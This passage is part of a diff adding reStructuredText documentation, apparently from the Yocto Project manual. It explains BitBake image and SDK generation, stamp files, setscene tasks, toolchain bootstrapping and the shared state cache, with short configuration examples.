+ directories does not exist. Creating such feeds usually requires some
+ kind of feed maintenance mechanism that would upload the new packages
+ into an official package feed (e.g. the Ångström distribution). This
+ functionality is highly distribution-specific and thus is not
+ provided out of the box.
+
+.. _image-generation-dev-environment:
+
+Image Generation
+~~~~~~~~~~~~~~~~
+
+Once packages are split and stored in the Package Feeds area, the build
+system uses BitBake to generate the root filesystem image:
+
+.. image:: figures/image-generation.png
+ :align: center
+
+The image generation process consists of several stages and depends on
+several tasks and variables. The
+:ref:`ref-tasks-rootfs` task creates
+the root filesystem (file and directory structure) for an image. This
+task uses several key variables to help create the list of packages to
+actually install:
+
+- :term:`IMAGE_INSTALL`: Lists
+ out the base set of packages from which to install from the Package
+ Feeds area.
+
+- :term:`PACKAGE_EXCLUDE`:
+ Specifies packages that should not be installed into the image.
+
+- :term:`IMAGE_FEATURES`:
+ Specifies features to include in the image. Most of these features
+ map to additional packages for installation.
+
+- :term:`PACKAGE_CLASSES`:
+ Specifies the package backend (e.g. RPM, DEB, or IPK) to use and
+ consequently helps determine where to locate packages within the
+ Package Feeds area.
+
+- :term:`IMAGE_LINGUAS`:
+ Determines the language(s) for which additional language support
+ packages are installed.
+
+- :term:`PACKAGE_INSTALL`:
+ The final list of packages passed to the package manager for
+ installation into the image.
+
+With :term:`IMAGE_ROOTFS`
+pointing to the location of the filesystem under construction and the
+``PACKAGE_INSTALL`` variable providing the final list of packages to
+install, the root file system is created.
+
+Package installation is under control of the package manager (e.g.
+dnf/rpm, opkg, or apt/dpkg) regardless of whether or not package
+management is enabled for the target. At the end of the process, if
+package management is not enabled for the target, the package manager's
+data files are deleted from the root filesystem. As part of the final
+stage of package installation, post installation scripts that are part
+of the packages are run. Any scripts that fail to run on the build host
+are run on the target when the target system is first booted. If you are
+using a
+:ref:`read-only root filesystem <dev-manual/dev-manual-common-tasks:creating a read-only root filesystem>`,
+all the post installation scripts must succeed on the build host during
+the package installation phase since the root filesystem on the target
+is read-only.
+
+The final stages of the ``do_rootfs`` task handle post processing. Post
+processing includes creation of a manifest file and optimizations.
+
+The manifest file (``.manifest``) resides in the same directory as the
+root filesystem image. This file lists out, line-by-line, the installed
+packages. The manifest file is useful for the
+:ref:`testimage <ref-classes-testimage*>` class,
+for example, to determine whether or not to run specific tests. See the
+:term:`IMAGE_MANIFEST`
+variable for additional information.
+
+Optimizing processes that are run across the image include ``mklibs``,
+``prelink``, and any other post-processing commands as defined by the
+:term:`ROOTFS_POSTPROCESS_COMMAND`
+variable. The ``mklibs`` process optimizes the size of the libraries,
+while the ``prelink`` process optimizes the dynamic linking of shared
+libraries to reduce start up time of executables.
+
+After the root filesystem is built, processing begins on the image
+through the :ref:`ref-tasks-image`
+task. The build system runs any pre-processing commands as defined by
+the
+:term:`IMAGE_PREPROCESS_COMMAND`
+variable. This variable specifies a list of functions to call before the
+build system creates the final image output files.
+
+The build system dynamically creates ``do_image_*`` tasks as needed,
+based on the image types specified in the
+:term:`IMAGE_FSTYPES` variable.
+The process turns everything into an image file or a set of image files
+and can compress the root filesystem image to reduce the overall size of
+the image. The formats used for the root filesystem depend on the
+``IMAGE_FSTYPES`` variable. Compression depends on whether the formats
+support compression.
+
+As an example, a dynamically created task when creating a particular
+image type would take the following form:
+::
+
+ do_image_type
+
+So, if the type
+as specified by the ``IMAGE_FSTYPES`` were ``ext4``, the dynamically
+generated task would be as follows:
+::
+
+ do_image_ext4
+
+The final task involved in image creation is the
+:ref:`do_image_complete <ref-tasks-image-complete>`
+task. This task completes the image by applying any image post
+processing as defined through the
+:term:`IMAGE_POSTPROCESS_COMMAND`
+variable. The variable specifies a list of functions to call once the
+build system has created the final image output files.
+
+.. note::
+
+ The entire image generation process is run under
+ Pseudo. Running under Pseudo ensures that the files in the root filesystem
+ have correct ownership.
+
+.. _sdk-generation-dev-environment:
+
+SDK Generation
+~~~~~~~~~~~~~~
+
+The OpenEmbedded build system uses BitBake to generate the Software
+Development Kit (SDK) installer scripts for both the standard SDK and
+the extensible SDK (eSDK):
+
+.. image:: figures/sdk-generation.png
+ :align: center
+
+.. note::
+
+ For more information on the cross-development toolchain generation,
+ see the ":ref:`overview-manual/overview-manual-concepts:cross-development toolchain generation`"
+ section. For information on advantages gained when building a
+ cross-development toolchain using the do_populate_sdk task, see the
+ ":ref:`sdk-manual/sdk-appendix-obtain:building an sdk installer`" section in
+ the Yocto Project Application Development and the Extensible Software
+ Development Kit (eSDK) manual.
+
+Like image generation, the SDK script process consists of several stages
+and depends on many variables. The
+:ref:`ref-tasks-populate_sdk`
+and
+:ref:`ref-tasks-populate_sdk_ext`
+tasks use these key variables to help create the list of packages to
+actually install. For information on the variables listed in the figure,
+see the "`Application Development SDK <#sdk-dev-environment>`__"
+section.
+
+The ``do_populate_sdk`` task helps create the standard SDK and handles
+two parts: a target part and a host part. The target part is the part
+built for the target hardware and includes libraries and headers. The
+host part is the part of the SDK that runs on the
+:term:`SDKMACHINE`.
+
+The ``do_populate_sdk_ext`` task helps create the extensible SDK and
+handles host and target parts differently than its counter part does for
+the standard SDK. For the extensible SDK, the task encapsulates the
+build system, which includes everything needed (host and target) for the
+SDK.
+
+Regardless of the type of SDK being constructed, the tasks perform some
+cleanup after which a cross-development environment setup script and any
+needed configuration files are created. The final output is the
+Cross-development toolchain installation script (``.sh`` file), which
+includes the environment setup script.
+
+Stamp Files and the Rerunning of Tasks
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+For each task that completes successfully, BitBake writes a stamp file
+into the :term:`STAMPS_DIR`
+directory. The beginning of the stamp file's filename is determined by
+the :term:`STAMP` variable, and the end
+of the name consists of the task's name and current `input
+checksum <#overview-checksums>`__.
+
+.. note::
+
+ This naming scheme assumes that
+ BB_SIGNATURE_HANDLER
+ is "OEBasicHash", which is almost always the case in current
+ OpenEmbedded.
+
+To determine if a task needs to be rerun, BitBake checks if a stamp file
+with a matching input checksum exists for the task. If such a stamp file
+exists, the task's output is assumed to exist and still be valid. If the
+file does not exist, the task is rerun.
+
+.. note::
+
+ The stamp mechanism is more general than the shared state (sstate)
+ cache mechanism described in the "`Setscene Tasks and Shared
+ State <#setscene-tasks-and-shared-state>`__" section. BitBake avoids
+ rerunning any task that has a valid stamp file, not just tasks that
+ can be accelerated through the sstate cache.
+
+ However, you should realize that stamp files only serve as a marker
+ that some work has been done and that these files do not record task
+ output. The actual task output would usually be somewhere in
+ :term:`TMPDIR` (e.g. in some
+ recipe's :term:`WORKDIR`.) What
+ the sstate cache mechanism adds is a way to cache task output that
+ can then be shared between build machines.
+
+Since ``STAMPS_DIR`` is usually a subdirectory of ``TMPDIR``, removing
+``TMPDIR`` will also remove ``STAMPS_DIR``, which means tasks will
+properly be rerun to repopulate ``TMPDIR``.
+
+If you want some task to always be considered "out of date", you can
+mark it with the :ref:`nostamp <bitbake:bitbake-user-manual/bitbake-user-manual-metadata:variable flags>`
+varflag. If some other task depends on such a task, then that task will
+also always be considered out of date, which might not be what you want.
+
+For details on how to view information about a task's signature, see the
+":ref:`dev-manual/dev-manual-common-tasks:viewing task variable dependencies`"
+section in the Yocto Project Development Tasks Manual.
+
+Setscene Tasks and Shared State
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+The description of tasks so far assumes that BitBake needs to build
+everything and no available prebuilt objects exist. BitBake does support
+skipping tasks if prebuilt objects are available. These objects are
+usually made available in the form of a shared state (sstate) cache.
+
+.. note::
+
+ For information on variables affecting sstate, see the
+ :term:`SSTATE_DIR`
+ and
+ :term:`SSTATE_MIRRORS`
+ variables.
+
+The idea of a setscene task (i.e ``do_``\ taskname\ ``_setscene``) is a
+version of the task where instead of building something, BitBake can
+skip to the end result and simply place a set of files into specific
+locations as needed. In some cases, it makes sense to have a setscene
+task variant (e.g. generating package files in the
+:ref:`do_package_write_* <ref-tasks-package_write_deb>`
+task). In other cases, it does not make sense (e.g. a
+:ref:`ref-tasks-patch` task or a
+:ref:`ref-tasks-unpack` task) since
+the work involved would be equal to or greater than the underlying task.
+
+In the build system, the common tasks that have setscene variants are
+:ref:`ref-tasks-package`,
+``do_package_write_*``,
+:ref:`ref-tasks-deploy`,
+:ref:`ref-tasks-packagedata`, and
+:ref:`ref-tasks-populate_sysroot`.
+Notice that these tasks represent most of the tasks whose output is an
+end result.
+
+The build system has knowledge of the relationship between these tasks
+and other preceding tasks. For example, if BitBake runs
+``do_populate_sysroot_setscene`` for something, it does not make sense
+to run any of the ``do_fetch``, ``do_unpack``, ``do_patch``,
+``do_configure``, ``do_compile``, and ``do_install`` tasks. However, if
+``do_package`` needs to be run, BitBake needs to run those other tasks.
+
+It becomes more complicated if everything can come from an sstate cache
+because some objects are simply not required at all. For example, you do
+not need a compiler or native tools, such as quilt, if nothing exists to
+compile or patch. If the ``do_package_write_*`` packages are available
+from sstate, BitBake does not need the ``do_package`` task data.
+
+To handle all these complexities, BitBake runs in two phases. The first
+is the "setscene" stage. During this stage, BitBake first checks the
+sstate cache for any targets it is planning to build. BitBake does a
+fast check to see if the object exists rather than a complete download.
+If nothing exists, the second phase, which is the setscene stage,
+completes and the main build proceeds.
+
+If objects are found in the sstate cache, the build system works
+backwards from the end targets specified by the user. For example, if an
+image is being built, the build system first looks for the packages
+needed for that image and the tools needed to construct an image. If
+those are available, the compiler is not needed. Thus, the compiler is
+not even downloaded. If something was found to be unavailable, or the
+download or setscene task fails, the build system then tries to install
+dependencies, such as the compiler, from the cache.
+
+The availability of objects in the sstate cache is handled by the
+function specified by the
+:term:`bitbake:BB_HASHCHECK_FUNCTION`
+variable and returns a list of available objects. The function specified
+by the
+:term:`bitbake:BB_SETSCENE_DEPVALID`
+variable is the function that determines whether a given dependency
+needs to be followed, and whether for any given relationship the
+function needs to be passed. The function returns a True or False value.
+
+.. _images-dev-environment:
+
+Images
+------
+
+The images produced by the build system are compressed forms of the root
+filesystem and are ready to boot on a target device. You can see from
+the `general workflow figure <#general-workflow-figure>`__ that BitBake
+output, in part, consists of images. This section takes a closer look at
+this output:
+
+.. image:: figures/images.png
+ :align: center
+
+.. note::
+
+ For a list of example images that the Yocto Project provides, see the
+ ":doc:`../ref-manual/ref-images`" chapter in the Yocto Project Reference
+ Manual.
+
+The build process writes images out to the :term:`Build Directory`
+inside the
+``tmp/deploy/images/machine/`` folder as shown in the figure. This
+folder contains any files expected to be loaded on the target device.
+The :term:`DEPLOY_DIR` variable
+points to the ``deploy`` directory, while the
+:term:`DEPLOY_DIR_IMAGE`
+variable points to the appropriate directory containing images for the
+current configuration.
+
+- kernel-image: A kernel binary file. The
+ :term:`KERNEL_IMAGETYPE`
+ variable determines the naming scheme for the kernel image file.
+ Depending on this variable, the file could begin with a variety of
+ naming strings. The ``deploy/images/``\ machine directory can contain
+ multiple image files for the machine.
+
+- root-filesystem-image: Root filesystems for the target device (e.g.
+ ``*.ext3`` or ``*.bz2`` files). The
+ :term:`IMAGE_FSTYPES`
+ variable determines the root filesystem image type. The
+ ``deploy/images/``\ machine directory can contain multiple root
+ filesystems for the machine.
+
+- kernel-modules: Tarballs that contain all the modules built for the
+ kernel. Kernel module tarballs exist for legacy purposes and can be
+ suppressed by setting the
+ :term:`MODULE_TARBALL_DEPLOY`
+ variable to "0". The ``deploy/images/``\ machine directory can
+ contain multiple kernel module tarballs for the machine.
+
+- bootloaders: If applicable to the target machine, bootloaders
+ supporting the image. The ``deploy/images/``\ machine directory can
+ contain multiple bootloaders for the machine.
+
+- symlinks: The ``deploy/images/``\ machine folder contains a symbolic
+ link that points to the most recently built file for each machine.
+ These links might be useful for external scripts that need to obtain
+ the latest version of each file.
+
+.. _sdk-dev-environment:
+
+Application Development SDK
+---------------------------
+
+In the `general workflow figure <#general-workflow-figure>`__, the
+output labeled "Application Development SDK" represents an SDK. The SDK
+generation process differs depending on whether you build an extensible
+SDK (e.g. ``bitbake -c populate_sdk_ext`` imagename) or a standard SDK
+(e.g. ``bitbake -c populate_sdk`` imagename). This section takes a
+closer look at this output:
+
+.. image:: figures/sdk.png
+ :align: center
+
+The specific form of this output is a set of files that includes a
+self-extracting SDK installer (``*.sh``), host and target manifest
+files, and files used for SDK testing. When the SDK installer file is
+run, it installs the SDK. The SDK consists of a cross-development
+toolchain, a set of libraries and headers, and an SDK environment setup
+script. Running this installer essentially sets up your
+cross-development environment. You can think of the cross-toolchain as
+the "host" part because it runs on the SDK machine. You can think of the
+libraries and headers as the "target" part because they are built for
+the target hardware. The environment setup script is added so that you
+can initialize the environment before using the tools.
+
+.. note::
+
+ - The Yocto Project supports several methods by which you can set up
+ this cross-development environment. These methods include
+ downloading pre-built SDK installers or building and installing
+ your own SDK installer.
+
+ - For background information on cross-development toolchains in the
+ Yocto Project development environment, see the "`Cross-Development
+ Toolchain Generation <#cross-development-toolchain-generation>`__"
+ section.
+
+ - For information on setting up a cross-development environment, see
+ the :doc:`../sdk-manual/sdk-manual` manual.
+
+All the output files for an SDK are written to the ``deploy/sdk`` folder
+inside the :term:`Build Directory` as
+shown in the previous figure. Depending on the type of SDK, several
+variables exist that help configure these files. The following list
+shows the variables associated with an extensible SDK:
+
+- :term:`DEPLOY_DIR`: Points to
+ the ``deploy`` directory.
+
+- :term:`SDK_EXT_TYPE`:
+ Controls whether or not shared state artifacts are copied into the
+ extensible SDK. By default, all required shared state artifacts are
+ copied into the SDK.
+
+- :term:`SDK_INCLUDE_PKGDATA`:
+ Specifies whether or not packagedata is included in the extensible
+ SDK for all recipes in the "world" target.
+
+- :term:`SDK_INCLUDE_TOOLCHAIN`:
+ Specifies whether or not the toolchain is included when building the
+ extensible SDK.
+
+- :term:`SDK_LOCAL_CONF_WHITELIST`:
+ A list of variables allowed through from the build system
+ configuration into the extensible SDK configuration.
+
+- :term:`SDK_LOCAL_CONF_BLACKLIST`:
+ A list of variables not allowed through from the build system
+ configuration into the extensible SDK configuration.
+
+- :term:`SDK_INHERIT_BLACKLIST`:
+ A list of classes to remove from the
+ :term:`INHERIT` value globally
+ within the extensible SDK configuration.
+
+This next list, shows the variables associated with a standard SDK:
+
+- :term:`DEPLOY_DIR`: Points to
+ the ``deploy`` directory.
+
+- :term:`SDKMACHINE`: Specifies
+ the architecture of the machine on which the cross-development tools
+ are run to create packages for the target hardware.
+
+- :term:`SDKIMAGE_FEATURES`:
+ Lists the features to include in the "target" part of the SDK.
+
+- :term:`TOOLCHAIN_HOST_TASK`:
+ Lists packages that make up the host part of the SDK (i.e. the part
+ that runs on the ``SDKMACHINE``). When you use
+ ``bitbake -c populate_sdk imagename`` to create the SDK, a set of
+ default packages apply. This variable allows you to add more
+ packages.
+
+- :term:`TOOLCHAIN_TARGET_TASK`:
+ Lists packages that make up the target part of the SDK (i.e. the part
+ built for the target hardware).
+
+- :term:`SDKPATH`: Defines the
+ default SDK installation path offered by the installation script.
+
+- :term:`SDK_HOST_MANIFEST`:
+ Lists all the installed packages that make up the host part of the
+ SDK. This variable also plays a minor role for extensible SDK
+ development as well. However, it is mainly used for the standard SDK.
+
+- :term:`SDK_TARGET_MANIFEST`:
+ Lists all the installed packages that make up the target part of the
+ SDK. This variable also plays a minor role for extensible SDK
+ development as well. However, it is mainly used for the standard SDK.
+
+Cross-Development Toolchain Generation
+======================================
+
+The Yocto Project does most of the work for you when it comes to
+creating :ref:`sdk-manual/sdk-intro:the cross-development toolchain`. This
+section provides some technical background on how cross-development
+toolchains are created and used. For more information on toolchains, you
+can also see the :doc:`../sdk-manual/sdk-manual` manual.
+
+In the Yocto Project development environment, cross-development
+toolchains are used to build images and applications that run on the
+target hardware. With just a few commands, the OpenEmbedded build system
+creates these necessary toolchains for you.
+
+The following figure shows a high-level build environment regarding
+toolchain construction and use.
+
+.. image:: figures/cross-development-toolchains.png
+ :align: center
+
+Most of the work occurs on the Build Host. This is the machine used to
+build images and generally work within the the Yocto Project
+environment. When you run
+:term:`BitBake` to create an image, the
+OpenEmbedded build system uses the host ``gcc`` compiler to bootstrap a
+cross-compiler named ``gcc-cross``. The ``gcc-cross`` compiler is what
+BitBake uses to compile source files when creating the target image. You
+can think of ``gcc-cross`` simply as an automatically generated
+cross-compiler that is used internally within BitBake only.
+
+.. note::
+
+ The extensible SDK does not use
+ gcc-cross-canadian
+ since this SDK ships a copy of the OpenEmbedded build system and the
+ sysroot within it contains
+ gcc-cross
+ .
+
+The chain of events that occurs when ``gcc-cross`` is bootstrapped is as
+follows:
+::
+
+ gcc -> binutils-cross -> gcc-cross-initial -> linux-libc-headers -> glibc-initial -> glibc -> gcc-cross -> gcc-runtime
+
+- ``gcc``: The build host's GNU Compiler Collection (GCC).
+
+- ``binutils-cross``: The bare minimum binary utilities needed in order
+ to run the ``gcc-cross-initial`` phase of the bootstrap operation.
+
+- ``gcc-cross-initial``: An early stage of the bootstrap process for
+ creating the cross-compiler. This stage builds enough of the
+ ``gcc-cross``, the C library, and other pieces needed to finish
+ building the final cross-compiler in later stages. This tool is a
+ "native" package (i.e. it is designed to run on the build host).
+
+- ``linux-libc-headers``: Headers needed for the cross-compiler.
+
+- ``glibc-initial``: An initial version of the Embedded GNU C Library
+ (GLIBC) needed to bootstrap ``glibc``.
+
+- ``glibc``: The GNU C Library.
+
+- ``gcc-cross``: The final stage of the bootstrap process for the
+ cross-compiler. This stage results in the actual cross-compiler that
+ BitBake uses when it builds an image for a targeted device.
+
+ .. note::
+
+ If you are replacing this cross compiler toolchain with a custom
+ version, you must replace
+ gcc-cross
+ .
+
+ This tool is also a "native" package (i.e. it is designed to run on
+ the build host).
+
+- ``gcc-runtime``: Runtime libraries resulting from the toolchain
+ bootstrapping process. This tool produces a binary that consists of
+ the runtime libraries need for the targeted device.
+
+You can use the OpenEmbedded build system to build an installer for the
+relocatable SDK used to develop applications. When you run the
+installer, it installs the toolchain, which contains the development
+tools (e.g., ``gcc-cross-canadian``, ``binutils-cross-canadian``, and
+other ``nativesdk-*`` tools), which are tools native to the SDK (i.e.
+native to :term:`SDK_ARCH`), you
+need to cross-compile and test your software. The figure shows the
+commands you use to easily build out this toolchain. This
+cross-development toolchain is built to execute on the
+:term:`SDKMACHINE`, which might or
+might not be the same machine as the Build Host.
+
+.. note::
+
+ If your target architecture is supported by the Yocto Project, you
+ can take advantage of pre-built images that ship with the Yocto
+ Project and already contain cross-development toolchain installers.
+
+Here is the bootstrap process for the relocatable toolchain:
+::
+
+ gcc -> binutils-crosssdk -> gcc-crosssdk-initial -> linux-libc-headers -> glibc-initial -> nativesdk-glibc -> gcc-crosssdk -> gcc-cross-canadian
+
+- ``gcc``: The build host's GNU Compiler Collection (GCC).
+
+- ``binutils-crosssdk``: The bare minimum binary utilities needed in
+ order to run the ``gcc-crosssdk-initial`` phase of the bootstrap
+ operation.
+
+- ``gcc-crosssdk-initial``: An early stage of the bootstrap process for
+ creating the cross-compiler. This stage builds enough of the
+ ``gcc-crosssdk`` and supporting pieces so that the final stage of the
+ bootstrap process can produce the finished cross-compiler. This tool
+ is a "native" binary that runs on the build host.
+
+- ``linux-libc-headers``: Headers needed for the cross-compiler.
+
+- ``glibc-initial``: An initial version of the Embedded GLIBC needed to
+ bootstrap ``nativesdk-glibc``.
+
+- ``nativesdk-glibc``: The Embedded GLIBC needed to bootstrap the
+ ``gcc-crosssdk``.
+
+- ``gcc-crosssdk``: The final stage of the bootstrap process for the
+ relocatable cross-compiler. The ``gcc-crosssdk`` is a transitory
+ compiler and never leaves the build host. Its purpose is to help in
+ the bootstrap process to create the eventual ``gcc-cross-canadian``
+ compiler, which is relocatable. This tool is also a "native" package
+ (i.e. it is designed to run on the build host).
+
+- ``gcc-cross-canadian``: The final relocatable cross-compiler. When
+ run on the :term:`SDKMACHINE`,
+ this tool produces executable code that runs on the target device.
+ Only one cross-canadian compiler is produced per architecture since
+ they can be targeted at different processor optimizations using
+ configurations passed to the compiler through the compile commands.
+ This circumvents the need for multiple compilers and thus reduces the
+ size of the toolchains.
+
+.. note::
+
+ For information on advantages gained when building a
+ cross-development toolchain installer, see the
+ ":ref:`sdk-manual/sdk-appendix-obtain:building an sdk installer`" appendix
+ in the Yocto Project Application Development and the
+ Extensible Software Development Kit (eSDK) manual.
+
+Shared State Cache
+==================
+
+By design, the OpenEmbedded build system builds everything from scratch
+unless :term:`BitBake` can determine
+that parts do not need to be rebuilt. Fundamentally, building from
+scratch is attractive as it means all parts are built fresh and no
+possibility of stale data exists that can cause problems. When
+developers hit problems, they typically default back to building from
+scratch so they have a know state from the start.
+
+Building an image from scratch is both an advantage and a disadvantage
+to the process. As mentioned in the previous paragraph, building from
+scratch ensures that everything is current and starts from a known
+state. However, building from scratch also takes much longer as it
+generally means rebuilding things that do not necessarily need to be
+rebuilt.
+
+The Yocto Project implements shared state code that supports incremental
+builds. The implementation of the shared state code answers the
+following questions that were fundamental roadblocks within the
+OpenEmbedded incremental build support system:
+
+- What pieces of the system have changed and what pieces have not
+ changed?
+
+- How are changed pieces of software removed and replaced?
+
+- How are pre-built components that do not need to be rebuilt from
+ scratch used when they are available?
+
+For the first question, the build system detects changes in the "inputs"
+to a given task by creating a checksum (or signature) of the task's
+inputs. If the checksum changes, the system assumes the inputs have
+changed and the task needs to be rerun. For the second question, the
+shared state (sstate) code tracks which tasks add which output to the
+build process. This means the output from a given task can be removed,
+upgraded or otherwise manipulated. The third question is partly
+addressed by the solution for the second question assuming the build
+system can fetch the sstate objects from remote locations and install
+them if they are deemed to be valid.
+
+.. note::
+
+ - The build system does not maintain
+ :term:`PR` information as part of
+ the shared state packages. Consequently, considerations exist that
+ affect maintaining shared state feeds. For information on how the
+ build system works with packages and can track incrementing ``PR``
+ information, see the ":ref:`dev-manual/dev-manual-common-tasks:automatically incrementing a package version number`"
+ section in the Yocto Project Development Tasks Manual.
+
+ - The code in the build system that supports incremental builds is
+ not simple code. For techniques that help you work around issues
+ related to shared state code, see the
+ ":ref:`dev-manual/dev-manual-common-tasks:viewing metadata used to create the input signature of a shared state task`"
+ and
+ ":ref:`dev-manual/dev-manual-common-tasks:invalidating shared state to force a task to run`"
+ sections both in the Yocto Project Development Tasks Manual.
+
+The rest of this section goes into detail about the overall incremental
+build architecture, the checksums (signatures), and shared state.
+
+.. _concepts-overall-architecture:
+
+Overall Architecture
+--------------------
+
+When determining what parts of the system need to be built, BitBake
+works on a per-task basis rather than a per-recipe basis. You might
+wonder why using a per-task basis is preferred over a per-recipe basis.
+To help explain, consider having the IPK packaging backend enabled and
+then switching to DEB. In this case, the
+:ref:`ref-tasks-install` and
+:ref:`ref-tasks-package` task outputs
+are still valid. However, with a per-recipe approach, the build would
+not include the ``.deb`` files. Consequently, you would have to
+invalidate the whole build and rerun it. Rerunning everything is not the
+best solution. Also, in this case, the core must be "taught" much about
+specific tasks. This methodology does not scale well and does not allow
+users to easily add new tasks in layers or as external recipes without
+touching the packaged-staging core.
+
+.. _overview-checksums:
+
+Checksums (Signatures)
+----------------------
+
+The shared state code uses a checksum, which is a unique signature of a
+task's inputs, to determine if a task needs to be run again. Because it
+is a change in a task's inputs that triggers a rerun, the process needs
+to detect all the inputs to a given task. For shell tasks, this turns
+out to be fairly easy because the build process generates a "run" shell
+script for each task and it is possible to create a checksum that gives
+you a good idea of when the task's data changes.
+
+To complicate the problem, there are things that should not be included
+in the checksum. First, there is the actual specific build path of a
+given task - the :term:`WORKDIR`. It
+does not matter if the work directory changes because it should not
+affect the output for target packages. Also, the build process has the
+objective of making native or cross packages relocatable.
+
+.. note::
+
+ Both native and cross packages run on the
+ build host. However, cross packages generate output for the target
+ architecture.
+
+The checksum therefore needs to exclude ``WORKDIR``. The simplistic
+approach for excluding the work directory is to set ``WORKDIR`` to some
+fixed value and create the checksum for the "run" script.
+
+Another problem results from the "run" scripts containing functions that
+might or might not get called. The incremental build solution contains
+code that figures out dependencies between shell functions. This code is
+used to prune the "run" scripts down to the minimum set, thereby
+alleviating this problem and making the "run" scripts much more readable
+as a bonus.
+
+So far, solutions for shell scripts exist. What about Python tasks? The
+same approach applies even though these tasks are more difficult. The
+process needs to figure out what variables a Python function accesses
+and what functions it calls. Again, the incremental build solution
+contains code that first figures out the variable and function
+dependencies, and then creates a checksum for the data used as the input
+to the task.
+
+Like the ``WORKDIR`` case, situations exist where dependencies should be
+ignored. For these situations, you can instruct the build process to
+ignore a dependency by using a line like the following:
+::
+
+ PACKAGE_ARCHS[vardepsexclude] = "MACHINE"
+
+This example ensures that the :term:`PACKAGE_ARCHS` variable
+does not depend on the value of :term:`MACHINE`, even if it does
+reference it.
+
+Equally, there are cases where you need to add dependencies BitBake is
+not able to find. You can accomplish this by using a line like the
+following:
+::
+
+ PACKAGE_ARCHS[vardeps] = "MACHINE"
+
+This example explicitly
+adds the ``MACHINE`` variable as a dependency for ``PACKAGE_ARCHS``.
+
+As an example, consider a case with in-line Python where BitBake is not
+able to figure out dependencies. When running in debug mode (i.e. using
+``-DDD``), BitBake produces output when it discovers something for which
+it cannot figure out dependencies. The Yocto Project team has currently
+not managed to cover those dependencies in detail and is aware of the
+need to fix this situation.
+
+Thus far, this section has limited discussion to the direct inputs into
+a task. Information based on direct inputs is referred to as the
+"basehash" in the code. However, the question of a task's indirect
+inputs still exits - items already built and present in the
+:term:`Build Directory`. The checksum (or
+signature) for a particular task needs to add the hashes of all the
+tasks on which the particular task depends. Choosing which dependencies
+to add is a policy decision. However, the effect is to generate a master
+checksum that combines the basehash and the hashes of the task's
+dependencies.
+
+At the code level, a variety of ways exist by which both the basehash
+and the dependent task hashes can be influenced. Within the BitBake
+configuration file, you can give BitBake some extra information to help
+it construct the basehash. The following statement effectively results
+in a list of global variable dependency excludes (i.e. variables never
+included in any checksum):
+::
+
+ BB_HASHBASE_WHITELIST ?= "TMPDIR FILE PATH PWD BB_TASKHASH BBPATH DL_DIR \\
+ SSTATE_DIR THISDIR FILESEXTRAPATHS FILE_DIRNAME HOME LOGNAME SHELL TERM \\
+ USER FILESPATH STAGING_DIR_HOST STAGING_DIR_TARGET COREBASE PRSERV_HOST \\
+ PRSERV_DUMPDIR PRSERV_DUMPFILE PRSERV_LOCKDOWN PARALLEL_MAKE \\
+ CCACHE_DIR EXTERNAL_TOOLCHAIN CCACHE CCACHE_DISABLE LICENSE_PATH SDKPKGSUFFIX"
+
+The
+previous example excludes
+:term:`WORKDIR` since that variable
+is actually constructed as a path within
+:term:`TMPDIR`, which is on the
+whitelist.
+
+The rules for deciding which hashes of dependent tasks to include
+through dependency chains are more complex and are generally
+accomplished with a Python function. The code in
+``meta/lib/oe/sstatesig.py`` shows two examples of this and also
+illustrates how you can insert your own policy into the system if so
+desired. This file defines the two basic signature generators
+:term:`OpenEmbedded-Core (OE-Core)` uses: "OEBasic" and
+"OEBasicHash". By default, a dummy "noop" signature handler is enabled
+in BitBake. This means that behavior is unchanged from previous
+versions. OE-Core uses the "OEBasicHash" signature handler by default
+through this setting in the ``bitbake.conf`` file:
+::
+
+ BB_SIGNATURE_HANDLER ?= "OEBasicHash"
+
+The "OEBasicHash" ``BB_SIGNATURE_HANDLER`` is the same
+as the "OEBasic" version but adds the task hash to the `stamp
+files <#stamp-files-and-the-rerunning-of-tasks>`__. This results in any
+metadata change that changes the task hash, automatically causing the
+task to be run again. This removes the need to bump
+:term:`PR` values, and changes to metadata
+automatically ripple across the build.
+
+It is also worth noting that the end result of these signature
+generators is to make some dependency and hash information available to
+the build. This information includes:
+
+- ``BB_BASEHASH_task-``\ taskname: The base hashes for each task in the
+ recipe.
+
+- ``BB_BASEHASH_``\ filename\ ``:``\ taskname: The base hashes for each
+ dependent task.
+
+- ``BBHASHDEPS_``\ filename\ ``:``\ taskname: The task dependencies for
+ each task.
+
+- ``BB_TASKHASH``: The hash of the currently running task.
+
+Shared State
+------------
+
+Checksums and dependencies, as discussed in the previous section, solve
+half the problem of supporting a shared state. The other half of the
+problem is being able to use checksum information during the build and
+being able to reuse or rebuild specific components.
+
+The :ref:`sstate <ref-classes-sstate>` class is a
+relatively generic implementation of how to "capture" a snapshot of a
+given task. The idea is that the build process does not care about the
+source of a task's output. Output could be freshly built or it could be
+downloaded and unpacked from somewhere. In other words, the build
+process does not need to worry about its origin.
+
+Two types of output exist. One type is just about creating a directory
+in :term:`WORKDIR`. A good example is
+the output of either
+:ref:`ref-tasks-install` or
+:ref:`ref-tasks-package`. The other
+type of output occurs when a set of data is merged into a shared
+directory tree such as the sysroot.
+
+The Yocto Project team has tried to keep the details of the
+implementation hidden in ``sstate`` class. From a user's perspective,
+adding shared state wrapping to a task is as simple as this
+:ref:`ref-tasks-deploy` example taken
+from the :ref:`deploy <ref-classes-deploy>` class:
+::
+
+ DEPLOYDIR = "${WORKDIR}/deploy-${PN}"
+ SSTATETASKS += "do_deploy"
+ do_deploy[sstate-inputdirs] = "${DEPLOYDIR}"
+ do_deploy[sstate-outputdirs] = "${DEPLOY_DIR_IMAGE}"
+
+ python do_deploy_setscene () {
+ sstate_setscene(d)
+ }
+ addtask do_deploy_setscene
+ do_deploy[dirs] = "${DEPLOYDIR} ${B}"
+ do_deploy[stamp-extra-info] = "${MACHINE_ARCH}"
+
+The following list explains the previous example:
+
+- Adding "do_deploy" to ``SSTATETASKS`` adds some required
+ sstate-related processing, which is implemented in the
+ :ref:`sstate <ref-classes-sstate>` class, to
+ before and after the
+ :ref:`ref-tasks-deploy` task.
+
+- The ``do_deploy[sstate-inputdirs] = "${DEPLOYDIR}"`` declares that
+ ``do_deploy`` places its output in ``${DEPLOYDIR}`` when run normally
+ (i.e. when not using the sstate cache). This output becomes the input
+ to the shared state cache.
+
+- The ``do_deploy[sstate-outputdirs] = "${DEPLOY_DIR_IMAGE}"`` line
+ causes the contents of the shared state cache to be copied to
+ ``${DEPLOY_DIR_IMAGE}``.
+
+ .. note::
+
+ If ``do_deploy`` is not already in the shared state cache or if its input
